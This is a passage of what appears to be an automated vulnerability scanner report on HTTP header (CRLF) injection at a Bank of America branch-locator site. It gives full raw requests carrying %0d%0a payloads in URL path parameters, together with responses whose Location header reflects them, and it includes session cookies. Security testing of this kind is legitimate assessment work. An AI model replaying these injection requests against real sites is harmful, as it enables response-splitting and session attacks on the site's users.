throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:56:48 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=33DFE49ABA6A87FC808ECBEA61F0382D.ftb-web2; Path=/locator/locator Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/b2d6d 2d5aa7ad1ab/bank_branch_locations/action=route?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload 71653%0d%0a2167ca69f4 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/800__Avenue__of__the__Americas_10001_NEW__YORK_NY/71653%0d%0a2167ca69f4/action=route HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:55:11 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=D3226F6422CE153C8C6E986854689139.ftb-web2; Path=/locator/locator Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/800__Avenue__of__the__Americas_10001_NEW__YORK_NY/71653 2167ca69f4/action=route?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 5 is copied into the Location response header. The payload bff7d%0d%0abf7d23601e6 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/800__Avenue__of__the__Americas_10001_NEW__YORK_NY/bank_branch_locations/bff7d%0d%0abf7d23601e6=route HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:53:44 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=FC36A3F2CC1F432EE6F63615C8599340.ftb-web2; Path=/locator/locator P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/800__Avenue__of__the__Americas_10001_NEW__YORK_NY/bank_branch_locations/bff7d bf7d23601e6=route?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload e3da8%0d%0ac96f3d8a01 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/e3da8%0d%0ac96f3d8a01 HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:43:13 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=15D711D0BF74D3DED640A3324CF82AF8.ftb-web2; Path=/locator/locator P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/e3da8 c96f3d8a01?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload 3d96e%0d%0a21fcd776d7a was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/3d96e%0d%0a21fcd776d7a HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:41:41 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=45C2BB5161478F4314972D922E49D26E.ftb-web2; Path=/locator/locator P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/3d96e 21fcd776d7a?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload 52bc5%0d%0a2dd8bea8515 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/52bc5%0d%0a2dd8bea8515?shouldTest=true HTTP/1.1 Host: locators.bankofamerica.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; testCookie=INFONOW_TEST_COOKIE_SUPPORT
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:41:55 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=2B485BA9B7CD17A442FFC8D4DEFE069C.ftb-web2; Path=/locator/locator P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Location: http://locators.bankofamerica.com/locator/locator/52bc5 2dd8bea8515 Content-Language: en-US Content-Length: 0 Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload 455a7%0d%0affc54faad05 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/455a7%0d%0affc54faad05 HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:54:23 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=5DF60E3BBADEFC8890A3110A0F4A335E.ftb-web2; Path=/locator/locator P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/455a7 ffc54faad05?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload c5998%0d%0a0abafe400bb was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/c5998%0d%0a0abafe400bb HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:54:19 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=00CF7E58857CAF164370F9FB414A5F98.ftb-web2; Path=/locator/locator P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/c5998 0abafe400bb?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload 62775%0d%0aa3106a50b28 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/62775%0d%0aa3106a50b28?startsWithFilterProperty=searchCustom&openedItemProperty=searchCustom__multiCheckDeposit HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:44:50 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=334BF7D49085EB45B1979F50598E9B2D.ftb-web2; Path=/locator/locator P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/62775 a3106a50b28?startsWithFilterProperty=searchCustom&openedItemProperty=searchCustom__multiCheckDeposit&shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload a6e8c%0d%0a4043d28ed85 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/a6e8c%0d%0a4043d28ed85?startIndex=11 HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; 